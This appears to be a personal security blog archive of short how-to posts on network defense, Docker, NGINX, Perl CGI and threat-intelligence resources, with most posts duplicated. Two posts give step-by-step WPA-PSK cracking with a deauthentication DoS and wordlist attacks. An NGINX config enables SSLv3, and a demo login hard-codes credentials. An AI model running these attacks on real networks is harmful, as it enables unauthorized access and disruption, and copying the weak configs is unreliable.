Friday, December 27, 2019
Check if HTTPS service got any vulnerability with its Cipher Suite
#nmap -Pn --script ssl-enum-ciphers -p 443 IP_ADDRESS/HOSTNAME
Thursday, December 26, 2019
Online Malware Analysis Resource updated on 20191226
Sandbox:
https://malwareanalyser.io/
https://www.hybrid-analysis.com/
https://malware.sekoia.fr/new
https://s.threatbook.cn/
Multi-Scan:
https://www.virustotal.com/
https://metadefender.opswat.com/
Office Files Scan:
https://labs.inquest.net/dfi
PCAP Scan:
https://www.networktotal.com/index.html
Web Service Preview:
https://urlscan.io/
Web Service Risk Assessment:
https://zulu.zscaler.com/
https://www.ssllabs.com/
Black List Lookup:
https://talosintelligence.com/
SPAM Lookup:
https://www.spamhaus.org/lookup/
https://malwareanalyser.io/
https://www.hybrid-analysis.com/
https://malware.sekoia.fr/new
https://s.threatbook.cn/
Multi-Scan:
https://www.virustotal.com/
https://metadefender.opswat.com/
Office Files Scan:
https://labs.inquest.net/dfi
PCAP Scan:
https://www.networktotal.com/index.html
Web Service Preview:
https://urlscan.io/
Web Service Risk Assessment:
https://zulu.zscaler.com/
https://www.ssllabs.com/
Black List Lookup:
https://talosintelligence.com/
SPAM Lookup:
https://www.spamhaus.org/lookup/
Monday, December 23, 2019
The ngrep command makes NIDS become NIPS
1) Suppose the source sending out malicious packets has been confirmed, use the ngrep command:
#ngrep -d any -q -K 10 host 192.168.1.10
#ngrep -d any -q -K 10 port 8080
#ngrep -d any -q -K 10 host 192.168.1.10 and port 22
2) If a malicious snippet of those malicious packets has been identified, leverage the ngrep command:
#ngrep -d wlan0 -q -K 10 "^GET .* HTTP/1.[01]" "host www.google.es"
#ngrep -d any -q -K 10 “abcd” icmp
Bear in mind that the parameter, -d, is followed by the network interface, and -K is followed by a value representing how many RST packets would be sent to terminate the corresponding connections. The parameter, -q, shows that the application is running on the quiet mode.
#ngrep -d any -q -K 10 host 192.168.1.10
#ngrep -d any -q -K 10 port 8080
#ngrep -d any -q -K 10 host 192.168.1.10 and port 22
2) If a malicious snippet of those malicious packets has been identified, leverage the ngrep command:
#ngrep -d wlan0 -q -K 10 "^GET .* HTTP/1.[01]" "host www.google.es"
#ngrep -d any -q -K 10 “abcd” icmp
Bear in mind that the parameter, -d, is followed by the network interface, and -K is followed by a value representing how many RST packets would be sent to terminate the corresponding connections. The parameter, -q, shows that the application is running on the quiet mode.
Utilize several commands to pinpoint DDoS in Linux environments
1) First leverage the ifstat command to confirm the presence of DDoS:
#ifstat
OR
#ifstat -i INTERFACE
2) Then utilize either the iftop or iptraf to uncover the service under the attack:
#iftop -i INTERFACE
OR
#iptraf -i INTERFACE
3) If this is a client PC, leverage the nethogs command to determine which process is ocuppying the bandwidth.
#nethogs INTERFACE
#ifstat
OR
#ifstat -i INTERFACE
2) Then utilize either the iftop or iptraf to uncover the service under the attack:
#iftop -i INTERFACE
OR
#iptraf -i INTERFACE
3) If this is a client PC, leverage the nethogs command to determine which process is ocuppying the bandwidth.
#nethogs INTERFACE
Friday, December 20, 2019
Install Open Source Intelligence (OSINT) Framework through Docker
1) Install and run OSINT-Framework:
#/etc/init.d/docker start
#docker pull pierlo1/osint-framework:latest
#docker run --rm -i -t -p 8080:8080 pierlo1/osint-framework
2) Use a browser to open http://127.0.0.1:8080/
#/etc/init.d/docker start
#docker pull pierlo1/osint-framework:latest
#docker run --rm -i -t -p 8080:8080 pierlo1/osint-framework
2) Use a browser to open http://127.0.0.1:8080/
Web-to-Onion Proxies
There is a means allowing you to explore those hidden service residing in Tor network / Dark Web / Deep Web, and it is:
tor2web (https://www.tor2web.org/) :
Add the top level domain, ".to", at the end of the onion pseudo URL.
tor2web (https://www.tor2web.org/) :
Add the top level domain, ".to", at the end of the onion pseudo URL.
Tuesday, December 10, 2019
Requirement Specification of Endpoint Response Tool
1) Information Gathering
- Read Process List
- Read Details of each process
- Read "netstat -anb" information
2) Infected Endpoint Control
- Execute commands on endpoints
- Upload/Download files between endpoints and controllers
- Capture packets on endpoints
3) Security Detection Enhancement
- Built-in Malicious Code feeds that can be updated automatically
- Upload suspicious files to an on premise sandbox to analyze
- Import YARA rules
- Import Snort rules
4) Incident Response
- Block processes from sending packets
- Stop processes
- Clean / Delete infected files
- Isolate machines
5) Threat Intelligence Integration
- Asset Information Management
- Built-in Threat Intelligece feeds that can be updated automatically
- Sending alerts to SIEM through Syslog
6) Constraint
- Being able to coexist with such Antivirus as Symantec SEP
- Read Process List
- Read Details of each process
- Read "netstat -anb" information
2) Infected Endpoint Control
- Execute commands on endpoints
- Upload/Download files between endpoints and controllers
- Capture packets on endpoints
3) Security Detection Enhancement
- Built-in Malicious Code feeds that can be updated automatically
- Upload suspicious files to an on premise sandbox to analyze
- Import YARA rules
- Import Snort rules
4) Incident Response
- Block processes from sending packets
- Stop processes
- Clean / Delete infected files
- Isolate machines
5) Threat Intelligence Integration
- Asset Information Management
- Built-in Threat Intelligece feeds that can be updated automatically
- Sending alerts to SIEM through Syslog
6) Constraint
- Being able to coexist with such Antivirus as Symantec SEP
Decision Tree by Scikit-learn
#!/usr/bin/python
#Reference #1: http://benalexkeen.com/decision-tree-classifier-in-python-using-scikit-learn/
#Reference #2: https://www.datacamp.com/community/tutorials/decision-tree-classification-python
import pandas as pd
df = pd.read_csv('./alert_fast2.csv', index_col='No.')
print "Dataset Size : ", df.shape
print(df.head(10))
#We will be using Threat, Category, Proto, Src_ip, Src_port, Dst_ip, and Dst_port to predict the Result.
#Failed: Category, Src_ip, and Dst_ip are not integer values.
#df = df[['Threat', 'Category', 'Proto', 'Src_ip', 'Src_port', 'Dst_ip', 'Dst_port', 'Result']]
df = df[['Proto', 'Src_port', 'Dst_port', 'Result']]
#We need to convert those strings into integer values.
df['Result'] = df['Result'].map({'yes': 1, 'no': 0})
df['Proto'] = df['Proto'].map({'TCP': 1, 'UDP': 2, 'ICMP': 3, 'IP': 4})
#Drop any rows with missing values.
df = df.dropna()
X = df.drop('Result', axis=1)
y = df['Result']
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1)
from sklearn import tree
model = tree.DecisionTreeClassifier()
model.fit(X_train, y_train)
y_predict = model.predict(X_test)
from sklearn.metrics import accuracy_score
print "Accuracy : ", accuracy_score(y_test, y_predict)
# Making a Prediction On a New Sample
sample_one_pred = int(model.predict([[1, 1043, 80]]))
sample_two_pred = int(model.predict([[1, 1041, 80]]))
print "Sample_one_pred : ", sample_one_pred
print "Sample_two_pred : ", sample_two_pred
#Print out the tree
#from sklearn.tree.export import export_text
#from scikit.tree import export_text
#print(export_text(model))
#Reference #1: http://benalexkeen.com/decision-tree-classifier-in-python-using-scikit-learn/
#Reference #2: https://www.datacamp.com/community/tutorials/decision-tree-classification-python
import pandas as pd
df = pd.read_csv('./alert_fast2.csv', index_col='No.')
print "Dataset Size : ", df.shape
print(df.head(10))
#We will be using Threat, Category, Proto, Src_ip, Src_port, Dst_ip, and Dst_port to predict the Result.
#Failed: Category, Src_ip, and Dst_ip are not integer values.
#df = df[['Threat', 'Category', 'Proto', 'Src_ip', 'Src_port', 'Dst_ip', 'Dst_port', 'Result']]
df = df[['Proto', 'Src_port', 'Dst_port', 'Result']]
#We need to convert those strings into integer values.
df['Result'] = df['Result'].map({'yes': 1, 'no': 0})
df['Proto'] = df['Proto'].map({'TCP': 1, 'UDP': 2, 'ICMP': 3, 'IP': 4})
#Drop any rows with missing values.
df = df.dropna()
X = df.drop('Result', axis=1)
y = df['Result']
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1)
from sklearn import tree
model = tree.DecisionTreeClassifier()
model.fit(X_train, y_train)
y_predict = model.predict(X_test)
from sklearn.metrics import accuracy_score
print "Accuracy : ", accuracy_score(y_test, y_predict)
# Making a Prediction On a New Sample
sample_one_pred = int(model.predict([[1, 1043, 80]]))
sample_two_pred = int(model.predict([[1, 1041, 80]]))
print "Sample_one_pred : ", sample_one_pred
print "Sample_two_pred : ", sample_two_pred
#Print out the tree
#from sklearn.tree.export import export_text
#from scikit.tree import export_text
#print(export_text(model))
Tuesday, December 3, 2019
Deploy SSL Offloading Reverse Proxy through Docker and NGINX
References:
1)https://docs.nginx.com/nginx/admin-guide/web-server/reverse-proxy/
2)https://docs.nginx.com/nginx/admin-guide/security-controls/terminating-ssl-http/?_ga=2.180791975.1262112524.1575417960-988469526.1575417960
Test NGNIX docker:
#/etc/init.d/docker start
#docker pull nginx
#docker run -it nginx /bin/bash
Install essential software:
docker#apt-get update ; apt-get install net-tools vim openssl file
Generate SSL certificate and the key:
docker#openssl req -newkey rsa:2048 -nodes -keyout /etc/ssl/certs/key.pem -x509 -days 365 -out /etc/ssl/certs/certificate.pem
Modify the nginx.conf file:
docker#cd /etc/nginx
docker#cp ./nginx.conf ./nginx.conf.bak
docker#vi ./nginx.conf
Change the content of the nginx.conf to the content as follows:
---------------------------
user nginx;
worker_processes 1;
error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
stream {
upstream stream_backend {
server 8.8.8.8:81;
}
server {
listen 443 ssl;
proxy_pass stream_backend;
ssl_certificate /etc/ssl/certs/certificate.pem;
ssl_certificate_key /etc/ssl/certs/key.pem;
ssl_protocols SSLv3 TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_session_cache shared:SSL:20m;
ssl_session_timeout 4h;
ssl_handshake_timeout 30s;
}
}
---------------------------
:wq!
docker#/etc/init.d/nginx start
Create a new docker image:
#docker commit [CONTAINER ID] demonalex/nginx
1)https://docs.nginx.com/nginx/admin-guide/web-server/reverse-proxy/
2)https://docs.nginx.com/nginx/admin-guide/security-controls/terminating-ssl-http/?_ga=2.180791975.1262112524.1575417960-988469526.1575417960
Test NGNIX docker:
#/etc/init.d/docker start
#docker pull nginx
#docker run -it nginx /bin/bash
Install essential software:
docker#apt-get update ; apt-get install net-tools vim openssl file
Generate SSL certificate and the key:
docker#openssl req -newkey rsa:2048 -nodes -keyout /etc/ssl/certs/key.pem -x509 -days 365 -out /etc/ssl/certs/certificate.pem
Modify the nginx.conf file:
docker#cd /etc/nginx
docker#cp ./nginx.conf ./nginx.conf.bak
docker#vi ./nginx.conf
Change the content of the nginx.conf to the content as follows:
---------------------------
user nginx;
worker_processes 1;
error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
stream {
upstream stream_backend {
server 8.8.8.8:81;
}
server {
listen 443 ssl;
proxy_pass stream_backend;
ssl_certificate /etc/ssl/certs/certificate.pem;
ssl_certificate_key /etc/ssl/certs/key.pem;
ssl_protocols SSLv3 TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_session_cache shared:SSL:20m;
ssl_session_timeout 4h;
ssl_handshake_timeout 30s;
}
}
---------------------------
:wq!
docker#/etc/init.d/nginx start
Create a new docker image:
#docker commit [CONTAINER ID] demonalex/nginx
Sunday, December 1, 2019
Quick Set up NGINX with Modsecurity through Docker
Reference: https://hub.docker.com/r/owasp/modsecurity-crs
1) Pull the docker image first:
#/etc/init.d/docker start
#docker pull owasp/modsecurity-crs
2) Suppose Apache2 is running on the TCP81 of the server, and execute the following commands:
#/etc/init.d/apache2 start
3) Run the image:
#docker run -d -p 80:80 -e PARANOIA=5 -e PROXY=1 -e PROXYLOCATION=[URL] owasp/modsecurity-crs
Example:
#docker run -d -p 80:80 -e PARANOIA=5 -e PROXY=1 -e PROXYLOCATION=http://8.8.8.8:81/ owasp/modsecurity-crs
4) Check Modsecurity's log:
#docker exec -it [CONTAINER NAME] tail -n 30 -f /var/log/modsec_audit.log
Example:
#docker exec -it sweet_swartz tail -n 30 -f /var/log/modsec_audit.log
1) Pull the docker image first:
#/etc/init.d/docker start
#docker pull owasp/modsecurity-crs
2) Suppose Apache2 is running on the TCP81 of the server, and execute the following commands:
#/etc/init.d/apache2 start
3) Run the image:
#docker run -d -p 80:80 -e PARANOIA=5 -e PROXY=1 -e PROXYLOCATION=[URL] owasp/modsecurity-crs
Example:
#docker run -d -p 80:80 -e PARANOIA=5 -e PROXY=1 -e PROXYLOCATION=http://8.8.8.8:81/ owasp/modsecurity-crs
4) Check Modsecurity's log:
#docker exec -it [CONTAINER NAME] tail -n 30 -f /var/log/modsec_audit.log
Example:
#docker exec -it sweet_swartz tail -n 30 -f /var/log/modsec_audit.log
Tuesday, November 19, 2019
Create a Docker image by modifying existing images
There are two ways to create a new Docker image, and they are shown below:
- Create images by modifying existing images
- Create images by utilizing Dockerfiles
This document is to demonstrate how to create images by modifying existing images (P.S.: The following example shows how to modify an existing image named httpd and save it as a new image named demonalex/httpd:2)
#systemctl start docker
#docker run -it httpd /bin/bash
After modifying the image, execute the following commands:
#docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
884fa8ecd4bd httpd "/bin/bash" 8 minutes ago Up 8 minutes 80/tcp hardcore_aryabhata
#docker commit 884fa8ecd4bd demonalex/httpd:2
#docker images|grep httpd
demonalex/httpd 2 a6a8c482adec 41 seconds ago 205MB
httpd latest 19459a872194 2 months ago 154MB
#docker run -it demonalex/httpd:2 /bin/bash
- Create images by modifying existing images
- Create images by utilizing Dockerfiles
This document is to demonstrate how to create images by modifying existing images (P.S.: The following example shows how to modify an existing image named httpd and save it as a new image named demonalex/httpd:2)
#systemctl start docker
#docker run -it httpd /bin/bash
After modifying the image, execute the following commands:
#docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
884fa8ecd4bd httpd "/bin/bash" 8 minutes ago Up 8 minutes 80/tcp hardcore_aryabhata
#docker commit 884fa8ecd4bd demonalex/httpd:2
#docker images|grep httpd
demonalex/httpd 2 a6a8c482adec 41 seconds ago 205MB
httpd latest 19459a872194 2 months ago 154MB
#docker run -it demonalex/httpd:2 /bin/bash
Sunday, November 17, 2019
Docker File Import and Export
Export Image:
#docker save [OPTIONS] IMAGE [IMAGE...]
Example:
#docker save busybox > busybox.tar
Import Image:
#docker import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]
Example:
#docker import /path/to/exampleimage.tgz
Load Image from Files:
#docker load [OPTIONS]
Example:
#docker load < busybox.tar.gz
#docker save [OPTIONS] IMAGE [IMAGE...]
Example:
#docker save busybox > busybox.tar
Import Image:
#docker import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]
Example:
#docker import /path/to/exampleimage.tgz
Load Image from Files:
#docker load [OPTIONS]
Example:
#docker load < busybox.tar.gz
Installing KVM at Kali Linux
#apt-get update
#apt install -y qemu-kvm libvirt0 virt-manager libguestfs-tools bridge-utils
#mkdir -p /var/lib/libvirt/iso
#cp ~/Downloads/*.iso /var/lib/libvirt/iso
#virt-manager
#apt install -y qemu-kvm libvirt0 virt-manager libguestfs-tools bridge-utils
#mkdir -p /var/lib/libvirt/iso
#cp ~/Downloads/*.iso /var/lib/libvirt/iso
#virt-manager
Sunday, October 27, 2019
[eJPT][spider]A simple web crawler/spider
#mkdir -p /tmp/test1
#cd /tmp/test1
#wget -r -l 5 http://URL/index.html; grep -nR -i keyword URL | tee ./report.txt
#cd /tmp/test1
#wget -r -l 5 http://URL/index.html; grep -nR -i keyword URL | tee ./report.txt
Friday, October 25, 2019
cgi_login3.pl
#!/usr/bin/perl -wT
use CGI qw(:standard);
$username='test1';
$password='test2';
$salt='173173';
$string=$username.$password;
$digest=crypt($salt,$string);
$the_cookie = cookie('test');
if($the_cookie ne $digest){
print "Content-type: text/html\n\n";
print "<script>alert('Your are not allowed to access this page!')</script>";
print "<script>window.history.back()</script>";
}else{
print "Content-type: text/html\n\n";
print start_html("Authenticated");
print <<EOF;
You have successfully logged into the system!<br>
EOF
print end_html;
}
use CGI qw(:standard);
$username='test1';
$password='test2';
$salt='173173';
$string=$username.$password;
$digest=crypt($salt,$string);
$the_cookie = cookie('test');
if($the_cookie ne $digest){
print "Content-type: text/html\n\n";
print "<script>alert('Your are not allowed to access this page!')</script>";
print "<script>window.history.back()</script>";
}else{
print "Content-type: text/html\n\n";
print start_html("Authenticated");
print <<EOF;
You have successfully logged into the system!<br>
EOF
print end_html;
}
cgi_login2.pl
#!/usr/bin/perl -wT
use CGI qw(:standard);
$username='test1';
$password='test2';
$salt='173173';
$string=$username.$password;
$digest=crypt($salt,$string);
$user = param('username');
$pass = param('password');
if(($user eq $username) && ($pass eq $password)){
$cookie = cookie(-name => 'test', -value => "$digest");
print redirect(-url => 'cgi_login3.pl', -cookie => $cookie);
}elsif((defined($user)) || (defined($pass))){
print "Content-type: text/html\n\n";
print "<script>alert('The username or password is wrong!')</script>";
print "<script>window.history.back()</script>";
}else{
;
}
use CGI qw(:standard);
$username='test1';
$password='test2';
$salt='173173';
$string=$username.$password;
$digest=crypt($salt,$string);
$user = param('username');
$pass = param('password');
if(($user eq $username) && ($pass eq $password)){
$cookie = cookie(-name => 'test', -value => "$digest");
print redirect(-url => 'cgi_login3.pl', -cookie => $cookie);
}elsif((defined($user)) || (defined($pass))){
print "Content-type: text/html\n\n";
print "<script>alert('The username or password is wrong!')</script>";
print "<script>window.history.back()</script>";
}else{
;
}
cgi_login1.pl
#!/usr/bin/perl -wT
use CGI qw(:standard);
print header;
print start_html("Login");
print <<EndHTML;
<form action="cgi_login2.pl" method="POST">
Please enter your login name and password.<br>
username: <input type="text" name="username" size=10><br>
password: <input type="password" name="password" size=10><p>
Be sure you have cookies turned on in your browser.<p>
<input type="submit" value="Log In">
</form>
EndHTML
print end_html;
use CGI qw(:standard);
print header;
print start_html("Login");
print <<EndHTML;
<form action="cgi_login2.pl" method="POST">
Please enter your login name and password.<br>
username: <input type="text" name="username" size=10><br>
password: <input type="password" name="password" size=10><p>
Be sure you have cookies turned on in your browser.<p>
<input type="submit" value="Log In">
</form>
EndHTML
print end_html;
Sunday, October 20, 2019
Enable Perl-CGI at Apache2
Enable CGI:
#ln -s /etc/apache2/conf-available/serve-cgi-bin.conf /etc/apache2/conf-enabled/serve-cgi-bin.conf
#ln -s /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load
Add a CGI script:
#touch /usr/lib/cgi-bin/test.pl
#vi /usr/lib/cgi-bin/test.pl
-----------------------------
#!/usr/bin/perl
print "Content-type: text/html\n\n";
print "Testing";
:wq!
-----------------------------
#cd /usr/lib
#chmod -R +x ./cgi-bin
Restart Apache2:
#systemctl restart apache2.service
Verify:
Access http://127.0.0.1/cgi-bin/test.pl
#ln -s /etc/apache2/conf-available/serve-cgi-bin.conf /etc/apache2/conf-enabled/serve-cgi-bin.conf
#ln -s /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load
Add a CGI script:
#touch /usr/lib/cgi-bin/test.pl
#vi /usr/lib/cgi-bin/test.pl
-----------------------------
#!/usr/bin/perl
print "Content-type: text/html\n\n";
print "Testing";
:wq!
-----------------------------
#cd /usr/lib
#chmod -R +x ./cgi-bin
Restart Apache2:
#systemctl restart apache2.service
Verify:
Access http://127.0.0.1/cgi-bin/test.pl
Sunday, October 6, 2019
Install Docker in Kali Linux
References:
https://www.runoob.com/docker/docker-tutorial.html
Installation:
#curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
#echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' > /etc/apt/sources.list.d/docker.list
#apt-get update
#apt-get remove docker docker-engine docker.io
#apt-get install docker-ce
Testing:
#docker run hello-world
Start and Enable Docker:
#systemctl enable docker
#systemctl start docker
Search and Pull a docker:
#docker search apache
#docker pull httpd
Show installed images:
#docker images
Run a docker: (P.S.: "-d" represents running in the background, and "-P" represents Transport-Layer Port Mapping)
#docker run -d -P httpd
And the mapped Transport-Layer port can be specified:
#docker run -d -p 8443:443 httpd
The command above maps the docker's TCP443 to the host machine's TCP8443.
Run a docker in a shell:
#docker run -t -i IMAGE_NAME /bin/bash
Such as:
#docker run -t -i metasploitframework/metasploit-framework /bin/bash
Enter a running docker with a shell:
#docker exec -t -i CONTAINER_ID /bin/bash
Such as:
#docker exec -t -i b936b0afeb23 /bin/bash
Show what dockers are running:
#docker ps
Show Transport-Layer ports related to the docker:
#docker port CONTAINER_ID
Such as:
#docker port b936b0afeb23
Show logs generated by the docker:
#docker logs -f CONTAINER_ID
Such as:
#docker logs -f b936b0afeb23
Check the performance of the docker:
#docker top CONTAINER_ID
Such as:
#docker top b936b0afeb23
Show the details of the docker:
#docker inspect CONTAINER_ID
Such as:
#docker inspect b936b0afeb23
Stop a docker
docker stop CONTAINER_ID
Such as:
#docker stop b936b0afeb23
Delete a docker:
#docker rmi -f httpd
https://www.runoob.com/docker/docker-tutorial.html
Installation:
#curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
#echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' > /etc/apt/sources.list.d/docker.list
#apt-get update
#apt-get remove docker docker-engine docker.io
#apt-get install docker-ce
Testing:
#docker run hello-world
Start and Enable Docker:
#systemctl enable docker
#systemctl start docker
Search and Pull a docker:
#docker search apache
#docker pull httpd
Show installed images:
#docker images
Run a docker: (P.S.: "-d" represents running in the background, and "-P" represents Transport-Layer Port Mapping)
#docker run -d -P httpd
And the mapped Transport-Layer port can be specified:
#docker run -d -p 8443:443 httpd
The command above maps the docker's TCP443 to the host machine's TCP8443.
Run a docker in a shell:
#docker run -t -i IMAGE_NAME /bin/bash
Such as:
#docker run -t -i metasploitframework/metasploit-framework /bin/bash
Enter a running docker with a shell:
#docker exec -t -i CONTAINER_ID /bin/bash
Such as:
#docker exec -t -i b936b0afeb23 /bin/bash
Show what dockers are running:
#docker ps
Show Transport-Layer ports related to the docker:
#docker port CONTAINER_ID
Such as:
#docker port b936b0afeb23
Show logs generated by the docker:
#docker logs -f CONTAINER_ID
Such as:
#docker logs -f b936b0afeb23
Check the performance of the docker:
#docker top CONTAINER_ID
Such as:
#docker top b936b0afeb23
Show the details of the docker:
#docker inspect CONTAINER_ID
Such as:
#docker inspect b936b0afeb23
Stop a docker
docker stop CONTAINER_ID
Such as:
#docker stop b936b0afeb23
Delete a docker:
#docker rmi -f httpd
Monday, September 23, 2019
Monday, August 19, 2019
[Threat Intelligence] Check if already hacked
https://haveibeenpwned.com/PwnedWebsites
https://hacked-emails.com/confirmed/
https://hacked-emails.com/latest/
https://hacked-emails.com/confirmed/
https://hacked-emails.com/latest/
[Threat Intelligence] Third Party Web Security Scan
https://sitecheck.sucuri.net/
https://tools.geekflare.com/toolbox
https://observatory.mozilla.org/
https://tools.geekflare.com/toolbox
https://observatory.mozilla.org/
Sunday, August 4, 2019
[Threat Intelligence] Manufacturers
FireEye
Carbon Black
Crowdstrike
RecordFuture
Anomali
LookingGlass
IBM X-Force Exchange
BLUEVOYANT
Cisco Talos
ZeroFox
Digital Shadow
Carbon Black
Crowdstrike
RecordFuture
Anomali
LookingGlass
IBM X-Force Exchange
BLUEVOYANT
Cisco Talos
ZeroFox
Digital Shadow
[Threat Intelligence] Tor Service Searching
https://ahmia.fi/
http://onion.link/
http://www.tor2web.org
http://onion.link/
http://www.tor2web.org
Wednesday, July 17, 2019
[Threat Intelligence] Relevant Models
3-Triple model
Cyber Kill Chain model
Diamond model
F3EAD cycle model
Cyber Kill Chain model
Diamond model
F3EAD cycle model
Tuesday, July 2, 2019
[Threat Intelligence] Passive Vulnerability Detectors
shodan (https://www.shodan.io/)
zoomeye (https://www.zoomeye.org/)
censys (https://censys.io/)
securityrating (https://www.securityrating.io/)
FOFA (https://fofa.so/)
zoomeye (https://www.zoomeye.org/)
censys (https://censys.io/)
securityrating (https://www.securityrating.io/)
FOFA (https://fofa.so/)
Thursday, June 20, 2019
[Threat Intelligence] Three more lookup items that should be checked for Threat Intelligence
1) Brand Protection & Monitoring
Periodically determine if there is any malicious website faking the company to conduct phishing activities.
Search Engines: Google, Bing, and Yahoo
Checklist:
1.1) Check if there are any websites using similar top-level domain names to fake the company.
1.2) Check whether there are any other websites faking the company in the Internet.
2) Passive Internet-faced Vulnerability Lookup
Regularly look up those cyberspace search engines in order to discovery those Internet-faced vulnerabilities associated with the company.
Search Engines: Shodan (shodan.io) and ZoomEye (zoomeye.org)
Checklist:
2.1) Search keywords “XXXX” and “XXXX”, respectively.
2.2) Check if there is any vulnerability linked to the aforementioned two domains.
3) Internet Asset Blacklist/Reputation Checking
Periodically check if the company's domains are sitting in SPAM/Reputational Blacklists.
Search Engines: VirusTotal (https://www.virustotal.com/
3) Internet Asset Blacklist/Reputation Checking
Periodically check if the company's domains are sitting in SPAM/Reputational Blacklists.
Search Engines: VirusTotal (https://www.virustotal.com/
Friday, June 14, 2019
[Threat Intelligence] Five famous Dark Web search engines
torch xmh57jrzrnw6insl.onion
Ahmia msydqstlz2kzerdg.onion
candle gjobqjj7wyczbqie.onion
not Evil hss3uro2hsxfogfq.onion
haystak haystakvxad7wbk5.onion
onionland 3bbaaaccczcbdddz.onion
Crack WPA-PSK with Kali [Plan B]
1):
airmon-ng
2)Start Monitoring mode:
airmon-ng start wlan0
3):
airodump-ng wlan0mon
4)Capture frames:
airodump-ng --bssid BSSID_OF_AP -c CHANNEL -w FILE_NAME wlan0mon
5)Launch Unauthentication DoS:
aireplay-ng -0 0 -a BSSID_OF_AP wlan0mon
6)Stop Monitoring mode:
airmon-ng stop wlan0mon
7):
aircrack-ng CAP_FILE_PATH -J john
8):
hccap2john john.hccap > wpa
9):
john --wordlist=/usr/share/wordlists/rockyou.txt ./wpa
airmon-ng
2)Start Monitoring mode:
airmon-ng start wlan0
3):
airodump-ng wlan0mon
4)Capture frames:
airodump-ng --bssid BSSID_OF_AP -c CHANNEL -w FILE_NAME wlan0mon
5)Launch Unauthentication DoS:
aireplay-ng -0 0 -a BSSID_OF_AP wlan0mon
6)Stop Monitoring mode:
airmon-ng stop wlan0mon
7):
aircrack-ng CAP_FILE_PATH -J john
8):
hccap2john john.hccap > wpa
9):
john --wordlist=/usr/share/wordlists/rockyou.txt ./wpa
Crack WPA-PSK with Kali
1):
airmon-ng
2)Start Monitoring mode:
airmon-ng start wlan0
3):
airodump-ng wlan0mon
4)Capture frames:
airodump-ng --bssid BSSID_OF_AP -c CHANNEL -w FILE_NAME wlan0mon
5)Launch Unauthentication DoS:
aireplay-ng -0 0 -a BSSID_OF_AP wlan0mon
6)Stop Monitoring mode:
airmon-ng stop wlan0mon
7)Go to https://hashcat.net/cap2hccapx/ and upload the PCAP in order to have the HCCAPX file.
8):
hashcat -m 2500 -a 0 HCCAPX_FILE_PATH /usr/share/wordlists/rockyou.txt --force
airmon-ng
2)Start Monitoring mode:
airmon-ng start wlan0
3):
airodump-ng wlan0mon
4)Capture frames:
airodump-ng --bssid BSSID_OF_AP -c CHANNEL -w FILE_NAME wlan0mon
5)Launch Unauthentication DoS:
aireplay-ng -0 0 -a BSSID_OF_AP wlan0mon
6)Stop Monitoring mode:
airmon-ng stop wlan0mon
7)Go to https://hashcat.net/cap2hccapx/ and upload the PCAP in order to have the HCCAPX file.
8):
hashcat -m 2500 -a 0 HCCAPX_FILE_PATH /usr/share/wordlists/rockyou.txt --force
Saturday, June 1, 2019
Wednesday, May 29, 2019
Some websites checking HTTPS, SMTP over TLS, and SMTP.
Check HTTPS:
https://www.ssllabs.com/
Check SMTP over TLS:
https://www.checktls.com/
Check SMTP:
https://www.wormly.com/test-smtp-server
https://www.ssllabs.com/
Check SMTP over TLS:
https://www.checktls.com/
Check SMTP:
https://www.wormly.com/test-smtp-server
Wednesday, May 1, 2019
A Perl script to verify if your SMTP server has enabled SMTP over TLS.
#!/usr/bin/perl
use IO::Socket;
$|=1;
if(($#ARGV + 1 ) != 2){
die "Usage: $0 host_ip smtp_port\n";
}
$host_ip=shift;
$smtp_port=shift;
$sock=IO::Socket::INET->new(PeerAddr => "$host_ip:$smtp_port", Timeout => 5) || die "$host_ip:$smtp_port is closed!\n";
$sock->recv($mem, 1000, 0);
$sock->send("EHLO test.com\r\n");
$sock->recv($mem2, 5000, 0);
$sock->shutdown(2);
if(lc($mem2)=~m/starttls/){
print "$host_ip:$smtp_port supports SMTP over TLS!\n";
}else{
print "$host_ip:$smtp_port does not support SMTP over TLS!\n";
}
exit(1);
use IO::Socket;
$|=1;
if(($#ARGV + 1 ) != 2){
die "Usage: $0 host_ip smtp_port\n";
}
$host_ip=shift;
$smtp_port=shift;
$sock=IO::Socket::INET->new(PeerAddr => "$host_ip:$smtp_port", Timeout => 5) || die "$host_ip:$smtp_port is closed!\n";
$sock->recv($mem, 1000, 0);
$sock->send("EHLO test.com\r\n");
$sock->recv($mem2, 5000, 0);
$sock->shutdown(2);
if(lc($mem2)=~m/starttls/){
print "$host_ip:$smtp_port supports SMTP over TLS!\n";
}else{
print "$host_ip:$smtp_port does not support SMTP over TLS!\n";
}
exit(1);
Tuesday, April 30, 2019
Disable vulnerable Windows 7/10 system services for system hardening
Sources:
https://hardenwindows10forsecurity.com/
https://hardenwindows7forsecurity.com/Harden%20Windows%207%20Home%20Premium%2064bit%20-%20Standalone.html
Windows 10:
AllJoyn router service (manual) not used by me
AVCTP service (manual) related to bluetooth audio and video, not used by me
bluetooth handsfree service:(manual) not used by me.
bluetooth support service:(manual) not used by me.
Certificate propagation (manual) smart card related. not used by me.
Data Usage (automatic) phone releated
Enterprise App Management Service (manual) not used by me
fax:(manual) not used by me
HV Host Service (manual) virtualization, not used by me
Hyper-V ... all 8 services (manual) virtualization. not used by me
Microsoft Account Sign in Assistant (manual) MS Accounts not used by me, NEEDED only for activation.
Microsoft iSCSI initiator service:(manual) not used by me
Network Connection Broker (manual) used by Windows Store, not used by me
Payments and NFC/SE Manager (manual) payment mechanism used by phone
Phone Service (manual) not a phone
Printer spooler:(automatic) not used by me
